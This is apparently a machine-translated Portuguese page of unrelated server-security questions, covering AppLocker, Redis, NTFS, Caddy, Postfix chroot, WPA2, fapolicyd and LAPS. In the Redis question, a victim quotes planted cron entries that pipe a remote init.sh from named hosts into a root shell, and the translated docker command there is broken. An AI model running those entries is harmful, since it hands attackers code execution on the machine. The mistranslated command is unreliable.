Perguntas[security](server)

Estou trabalhando com o software "Wonderguard Filmora", que alguns de nossos usuários precisam, e estou encontrando um erro ao iniciar. O problema decorre da tentativa do software de executar uma detecção de atualização ao iniciar, que é executada por meio de um arquivo .tmp em USERS\User*\APPDATA\LOCAL\TEMP\IS-4CRPP.TMP\WONDERSHARE FILMORA UPDATE(X64).TMP. Esta é uma execução não assinada e, portanto, está sendo bloqueada pelo AppLocker. Agora, vejo que criar uma exceção do AppLocker para este caso é um risco à segurança, já que permitir que qualquer arquivo temporário seja executado a partir de um local é a única maneira de habilitar isso, já que o nome é diferente a cada vez.

Estou procurando uma solução de melhores práticas para resolver esse problema sem comprometer a segurança.

Tenho um Redis rodando no docker, iniciado com o comando:

docker run -d --restart a menos que seja interrompido -p 6379:6379 redis/redis-stack-server:latest

No entanto, todos os dados dentro do redis, incluindo os índices, são deletados a cada 30 minutos. Não sei por que isso acontece.

Poderia ser porque o VPS em que estou executando o Docker tem recursos muito limitados?

A especificação do VPS é 1 núcleo de CPU, 1 GB de RAM e swap e 20 GB de armazenamento. O SO é Ubuntu 22.04. O provedor de VPS é RackNerd. Eu executei o mesmo docker-redis em um VPS com a mesma especificação no OVH sem nenhum problema.

Estou executando o Redis no Docker porque quero usar a funcionalidade do Redisearch.

A cada poucas horas, chaves chamadas backup1 backup2 backup3 backup4 apareceriam no redis. Aqui está o valor para cada uma das chaves:

backup1 : */2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh
backup2: */3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh
backup3: */4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh
backup4: */5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh

Aqui estão os logs do docker:

root@racknerd-d76c238:~# docker logs b4bb752bcda8
8:C 08 Jan 2025 04:51:49.757 # WARNING Memory overcommit must be enabled! Without it, a background save or replication may fail under low memory condition. Being disabled, it can also cause failures without low memory condition, see https://github.com/jemalloc/jemalloc/issues/1328. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
8:C 08 Jan 2025 04:51:49.759 * oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
8:C 08 Jan 2025 04:51:49.759 * Redis version=7.4.1, bits=64, commit=00000000, modified=0, pid=8, just started
8:C 08 Jan 2025 04:51:49.759 * Configuration loaded
8:M 08 Jan 2025 04:51:49.761 * Increased maximum number of open files to 10032 (it was originally set to 1024).
8:M 08 Jan 2025 04:51:49.761 * monotonic clock: POSIX clock_gettime
8:M 08 Jan 2025 04:51:49.766 * Running mode=standalone, port=6379.
8:M 08 Jan 2025 04:51:49.768 * Module 'RedisCompat' loaded from /opt/redis-stack/lib/rediscompat.so
8:M 08 Jan 2025 04:51:49.790 * <search> Redis version found by RedisSearch : 7.4.1 - oss
8:M 08 Jan 2025 04:51:49.790 * <search> RediSearch version 2.10.5 (Git=2.10-e2f2                                                                    8a9)
8:M 08 Jan 2025 04:51:49.791 * <search> Low level api version 1 initialized successfully
8:M 08 Jan 2025 04:51:49.791 * <search> gc: ON, prefix min length: 2, min word length to stem: 4, prefix max expansions: 200, query timeout (ms): 500, timeout policy: return, cursor read size: 1000, cursor max idle (ms): 300000, max doctable size: 1000000, max number of search results:  10000,
8:M 08 Jan 2025 04:51:49.791 * <search> Initialized thread pools!
8:M 08 Jan 2025 04:51:49.793 * <search> Enabled role change notification
8:M 08 Jan 2025 04:51:49.793 * Module 'search' loaded from /opt/redis-stack/lib/redisearch.so
8:M 08 Jan 2025 04:51:49.804 * <timeseries> RedisTimeSeries version 11202, git_sha=5643fd4d6fcb1e9cf084fb2deb9285b08f4a6672
8:M 08 Jan 2025 04:51:49.805 * <timeseries> Redis version found by RedisTimeSeries : 7.4.1 - oss
8:M 08 Jan 2025 04:51:49.805 * <timeseries> loaded default CHUNK_SIZE_BYTES policy: 4096
8:M 08 Jan 2025 04:51:49.805 * <timeseries> loaded server DUPLICATE_POLICY: block
8:M 08 Jan 2025 04:51:49.805 * <timeseries> loaded default IGNORE_MAX_TIME_DIFF:0
8:M 08 Jan 2025 04:51:49.805 * <timeseries> loaded default IGNORE_MAX_VAL_DIFF:0.000000
8:M 08 Jan 2025 04:51:49.805 * <timeseries> Setting default series ENCODING to:compressed
8:M 08 Jan 2025 04:51:49.806 * <timeseries> Detected redis oss
8:M 08 Jan 2025 04:51:49.806 * Module 'timeseries' loaded from /opt/redis-stack/lib/redistimeseries.so
8:M 08 Jan 2025 04:51:49.816 * <ReJSON> Created new data type 'ReJSON-RL'
8:M 08 Jan 2025 04:51:49.818 * <ReJSON> version: 20803 git sha: unknown branch:unknown
8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V1 API
8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V2 API
8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V3 API
8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V4 API
8:M 08 Jan 2025 04:51:49.818 * <ReJSON> Exported RedisJSON_V5 API
8:M 08 Jan 2025 04:51:49.819 * <ReJSON> Enabled diskless replication
8:M 08 Jan 2025 04:51:49.819 * Module 'ReJSON' loaded from /opt/redis-stack/lib/rejson.so
8:M 08 Jan 2025 04:51:49.819 * <search> Acquired RedisJSON_V5 API
8:M 08 Jan 2025 04:51:49.822 * <bf> RedisBloom version 2.8.2 (Git=unknown)
8:M 08 Jan 2025 04:51:49.823 * Module 'bf' loaded from /opt/redis-stack/lib/redi                                                                    sbloom.so
8:M 08 Jan 2025 04:51:49.832 * <redisgears_2> Created new data type 'GearsType'
8:M 08 Jan 2025 04:51:49.835 * <redisgears_2> Detected redis oss
8:M 08 Jan 2025 04:51:49.838 # <redisgears_2> could not initialize RedisAI_InitError    
8:M 08 Jan 2025 04:51:49.838 * <redisgears_2> Failed loading RedisAI API.
8:M 08 Jan 2025 04:51:49.838 * <redisgears_2> RedisGears v2.0.20, sha='9b737886bf825fe29ddc2f8da81f73cbe0b4e858', build_type='release', built_for='Linux-ubuntu2                                                                    2.04.x86_64', redis_version:'7.4.1', enterprise:'false'.
8:M 08 Jan 2025 04:51:49.881 * <redisgears_2> Registered backend: js.
8:M 08 Jan 2025 04:51:49.890 * Module 'redisgears_2' loaded from /opt/redis-stack/lib/redisgears.so
8:M 08 Jan 2025 04:51:49.891 * Server initialized
8:M 08 Jan 2025 04:51:49.892 * Ready to accept connections tcp
8:M 08 Jan 2025 05:04:19.697 * DB saved on disk
8:M 08 Jan 2025 05:04:20.167 * <redisgears_2> Got a flush started event
8:M 08 Jan 2025 05:04:20.172 * DB saved on disk
8:M 08 Jan 2025 05:04:21.850 * DB saved on disk
8:M 08 Jan 2025 05:04:22.318 * DB saved on disk
8:M 08 Jan 2025 05:04:22.565 * <redisgears_2> Got a flush started event
8:M 08 Jan 2025 05:04:22.568 * DB saved on disk
8:M 08 Jan 2025 05:04:24.255 * DB saved on disk
8:M 08 Jan 2025 05:04:24.965 * DB saved on disk
8:M 08 Jan 2025 05:11:27.270 * <module> Scanning index idx:delivery in background
8:M 08 Jan 2025 05:11:27.270 * <module> Scanning index idx:delivery in background: done (scanned=0)
8:M 08 Jan 2025 05:11:27.270 * <module> Scanning index idx:ehailing in background
8:M 08 Jan 2025 05:11:27.271 * <module> Scanning index idx:ehailing in background: done (scanned=0)
8:M 08 Jan 2025 05:11:27.271 * <module> Scanning index idx:product in background
8:M 08 Jan 2025 05:11:27.271 * <module> Scanning index idx:product in background: done (scanned=0)
8:M 08 Jan 2025 05:46:37.355 * DB saved on disk
8:M 08 Jan 2025 05:46:37.746 * <redisgears_2> Got a flush started event
8:M 08 Jan 2025 05:46:37.750 * DB saved on disk
8:M 08 Jan 2025 05:46:39.517 * DB saved on disk
8:M 08 Jan 2025 05:46:39.910 * DB saved on disk
8:M 08 Jan 2025 05:46:40.104 * <redisgears_2> Got a flush started event
8:M 08 Jan 2025 05:46:40.107 * DB saved on disk
8:M 08 Jan 2025 05:46:41.466 * DB saved on disk
8:M 08 Jan 2025 05:46:42.050 * DB saved on disk
8:M 08 Jan 2025 06:21:30.817 * <module> Scanning index idx:business in background
8:M 08 Jan 2025 06:21:30.822 * <module> Scanning index idx:business in background: done (scanned=0)
8:M 08 Jan 2025 06:21:30.823 * <module> Scanning index idx:delivery in background
8:M 08 Jan 2025 06:21:30.825 * <module> Scanning index idx:delivery in background: done (scanned=0)
8:M 08 Jan 2025 06:21:30.826 * <module> Scanning index idx:ehailing in background
8:M 08 Jan 2025 06:21:30.827 * <module> Scanning index idx:ehailing in background: done (scanned=0)
8:M 08 Jan 2025 06:21:30.828 * <module> Scanning index idx:product in background
8:M 08 Jan 2025 06:21:30.831 * <module> Scanning index idx:product in background: done (scanned=0)
8:M 08 Jan 2025 06:46:43.095 * 1 changes in 3600 seconds. Saving...
8:M 08 Jan 2025 06:46:43.105 * Background saving started by pid 29
29:C 08 Jan 2025 06:46:43.123 * DB saved on disk
29:C 08 Jan 2025 06:46:43.124 * Fork CoW for RDB: current 0 MB, peak 0 MB, average 0 MB
8:M 08 Jan 2025 06:46:43.207 * Background saving terminated with success

Estou um pouco confuso sobre o porquê disso estar acontecendo.

Temos uma lista de dispositivos (arquivo .txt) localizada na unidade C: dentro de algumas pastas em um servidor Microsoft Windows 2022. Criei esse arquivo e as pastas a serem usadas como parte de um script PS. As Configurações de Segurança Avançadas mostram as permissões para o arquivo .txt, e tudo parece correto para qualquer usuário que tenha acesso ao servidor (um grupo de segurança dentro do grupo "Administradores") para poder editar/acessar o arquivo.

No entanto, quando um usuário (que tem acesso administrativo ao servidor) tenta abri-lo via bloco de notas, ele é avisado com "você não tem permissão para abrir este arquivo", como mostrado. Ele consegue navegar até o arquivo:

Permissões efetivas mostram que eles devem ter controle total:

Get-NTFSEffectiveAccessmostra isso também:

É somente quando adiciono a conta de usuário deles diretamente e atribuo permissões que eles finalmente conseguem acessá-la. O que estou esquecendo aqui?

Depois que vários sites em um host foram hackeados ao mesmo tempo, comecei a pesquisar alguns anos atrás e li em algumas perguntas do SF uma solução para o meu problema: pools PHP-FPM

Basicamente, esta foi a estrutura que projetei depois disto:

E por muito tempo eu me senti muito confiante de que tudo estava muito mais seguro do que antes, porque se um site fosse hackeado de alguma forma, isso nunca afetaria os outros sites no mesmo host.

Mas alguns meses atrás, comecei a falar com alguns caras do docker, e eles me disseram que eu deveria começar a experimentar com contêineres e migrar minha solução para um sistema dockerizado completo. Eles me sugeriram usar o Caddy. Mas depois de ler a documentação do Caddy, notei que a nova estrutura se parece com isso:

Basicamente, o que posso ver é que o servidor Caddy tem acesso irrestrito total a todos os arquivos. Diferentemente do Nginx anterior, em que tudo parecia compartimentado, aqui parece que se houver um problema de segurança no servidor Caddy, tudo pode ser comprometido.

Eu entendo que na maioria das vezes, a maioria dos hacks vem de erros de codificação nos pontos finais, o que significa que os elos mais fracos são os servidores docker FPM que são compartimentados. Mas se o Caddy for comprometido, ele vazará informações completas de todos os volumes

Neste ponto, tenho duas perguntas:

1. Já que muitas pessoas estão defendendo que o Docker é uma das opções mais seguras, estou esquecendo de algo? Sinto que isso é um pouco menos seguro do que meu sistema anterior (embora seja verdade que se todo o sistema de arquivos em um único host for comprometido, então não importa se há uma limitação de permissão de arquivo no host, então, nesse aspecto, é verdade que o Docker é mais seguro)

2. Há alguma outra prática para tornar a configuração Docker/Caddy/FPM mais segura da perspectiva de acesso a arquivos/PHP-software-dia-zero além de manter o sistema atualizado? Atualmente, tenho sockets de arquivo entre Caddy e FPM, mas sinto que ter todos os arquivos em apenas um host expõe muito o todo.

No mundo Windows, você pode pegar uma VM, aplicar todo o seu software e atualizações do Windows a ela e salvá-la como uma nova imagem base no formato .vhd ou iso. Chamamos isso de sysprep, e é ótimo permitir que você implante VMs totalmente atualizadas e seguras na primeira inicialização.

É necessário algum trabalho para criá-los e mantê-los atualizados, mas há uma enorme recompensa na implantação de máquinas seguras.

Este também é um conceito no mundo Linux? em caso afirmativo, quais são as terminologias e tecnologias utilizadas?

No momento, estamos usando a licença M365 Business Premium e, portanto, usando o Plano Premium 1 do Azure Information Protection. Criamos um rótulo de confidencialidade 'Interno' em compliance.microsoft.com, com a configuração "atribuir permissões agora" concedendo acesso de coautor a todos os usuários e grupos dentro da organização. O rótulo está funcionando no aplicativo Web Outlook do usuário. No entanto, ao redigir um novo e-mail no aplicativo de desktop Outlook, a opção de selecionar o rótulo está lá, mas quando clico no próprio rótulo, ele volta para "sem rótulo".

Todos os usuários cujo escopo é a política de rótulo podem ver o rótulo. mas não pode aplicá-lo. Algumas idéias:

1. Se eu criar um rótulo com a configuração "Permitir que os usuários atribuam permissão" e selecionar as opções "Somente criptografar" ou "Não encaminhar". Assim, os usuários poderão ver esse rótulo e aplicá-lo no aplicativo de desktop e na Web do Outlook.

2. Se eu criar rótulos com a configuração "Atribuir permissão agora", com escopo para arquivo e email, conceder acesso de coautor a 'Usuários autenticados' ou 'todos os usuários e grupos da organização', os usuários poderão selecionar o rótulo no Word /Excel etc, mas não o aplicativo Outlook Desktop. Eles podem atribuir o mesmo rótulo no Outlook Web. Estamos no mais recente - Microsoft® Outlook® para Microsoft 365 MSO (versão 2403 Build 16.0.17425.20176) de 64 bits. Usamos rótulos integrados por aplicativos do Office e nunca usamos o cliente de rotulagem unificada AIP ou o cliente clássico.

Entendo que o chroot permite isolar o Postfix, portanto, se um invasor conceder acesso a um programa Postfix, ele não poderá alterar maliciosamente algo fora do diretório chroot.

Parece que é uma prática comum executar o Postfix em uma prisão chroot. Por exemplo, o Debian instala o Postfix em um chroot por padrão.

Eu tenho algumas perguntas sobre isso:

1. Como um invasor pode conceder acesso ao sistema de arquivos quando apenas 25 e 587 portas estão disponíveis externamente? Como isso é possível através do protocolo SMTP? Possui vulnerabilidades?
2. Por que o Postfix é altamente recomendado para instalação em um chroot, mas o Dovecot que publica portas POP3/IMAP e armazena e-mails no sistema de arquivos não é?
3. É tão seguro usar ProtectSystemem uma unidade systemd para Postfix quanto em uma prisão chroot?

Recentemente comecei a trabalhar em uma empresa com uma rede corporativa WPA 2, onde vários dispositivos (digamos todos) compartilham a mesma conta de usuário Radius. Basicamente os funcionários usam a rede corporativa como se fosse uma rede pessoal WPA, onde conta+senha compartilhada substitui a senha compartilhada.

As redes empresariais WPA 2 estão seguras contra esse tipo de abuso? Obviamente, https e outros mecanismos de criptografia além do Wifi atenuariam o problema, mas isso está fora de questão.

Minha esperança seria que as redes corporativas WPA 2 funcionassem com criptografia por cliente, de modo que os clientes individuais não pudessem (simplesmente) farejar o tráfego uns dos outros (de outra forma não criptografado), mesmo que usassem a mesma conta radius.

saúde

Editar, esclarecimento: Minha principal preocupação com esta questão era se havia alguma medida de segurança no wpa 2 enterprise (como chaves compartilhadas exclusivas por cliente) que mitigariam o abuso acima.

Temos um servidor com SO Alma Linux 9.3. Por padrão (assim como todos os sistemas operacionais semelhantes ao RHEL atuais) ele está fapolicydhabilitado. Há também um servidor de aplicativos (WildFly/JBoss/Java) em execução nesse servidor. O aplicativo implantado processa alguns arquivos de dados (enviados pelos usuários) e funciona bem na situação padrão.

No entanto, atualmente, há um período em que o aplicativo precisa processar cerca de 1.000 arquivos por minuto. Em tal situação, a fapolicydsobrecarga utiliza aproximadamente 15% da CPU, o que avaliamos como excessivo.

Não consegui encontrar ninguém com problema semelhante na internet.

Também estou surpreso que não haja nenhuma fapolicydtag aqui no ServerFault.

Questões:

• Existe uma maneira de otimizar fapolicyda configuração para que ela possa decidir mais rapidamente se permite ou nega acesso a arquivos?
  • Uma coisa que me vem à mente é a ordenação das regras personalizadas.
  • Talvez usando curinga em vez de regras literais.
• Alguma dica de como avaliar o quanto fapolicydé importante para nós?
  • Se podemos simplesmente desligá-lo ou se é realmente uma boa ideia mantê-lo funcionando apesar da enorme sobrecarga.
  • Se outras distribuições também usam algo parecido fapolicydou se é "apenas segurança adicional" e SELinuxé suficiente. (Eu sei que eles não são iguais.)

Fontes:

• STIG recomenda ter fapolicydhabilitado
• Um artigo da Red Hat sobre os fundamentos dofapolicyd

Preparei um novo laptop associado ao AzureAD e instalei o cliente LAPS para o Active Directory local.

A execução do cliente LAPS resulta na mensagem "Servidor LDAP indisponível".

Como o laptop não está mais conectado ao Active Directory local, mas diretamente ao AzureAD, como posso recuperar a senha do administrador local para os outros computadores/laptops que ainda estão no Active Directory local e/ou apenas no Azure Hybrid Joined?

Agradeço antecipadamente